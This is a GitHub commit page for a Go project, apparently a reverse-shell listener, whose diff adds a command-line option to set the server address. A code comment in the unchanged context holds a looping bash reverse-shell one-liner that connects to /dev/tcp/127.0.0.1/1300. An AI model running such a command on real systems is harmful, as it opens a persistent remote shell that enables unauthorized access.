Skip to content

Commit

Permalink
Update main.go
Browse files Browse the repository at this point in the history
  • Loading branch information
delltaxa authored Feb 11, 2023
1 parent c75d84c commit a914e07
Showing 1 changed file with 5 additions and 1 deletion.
6 changes: 5 additions & 1 deletion main.go
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,10 @@ import (

// while true; do bash -c 'bash -i >& /dev/tcp/127.0.0.1/1300 0>&1'; sleep 10; done
func main() {
if len(os.Args) > 1 {
_server = os.Args[1]
}

go listenf()

fmt.Printf(logo)
Expand Down Expand Up @@ -59,4 +63,4 @@ func main() {


}
}
}

0 comments on commit a914e07

Please sign in to comment.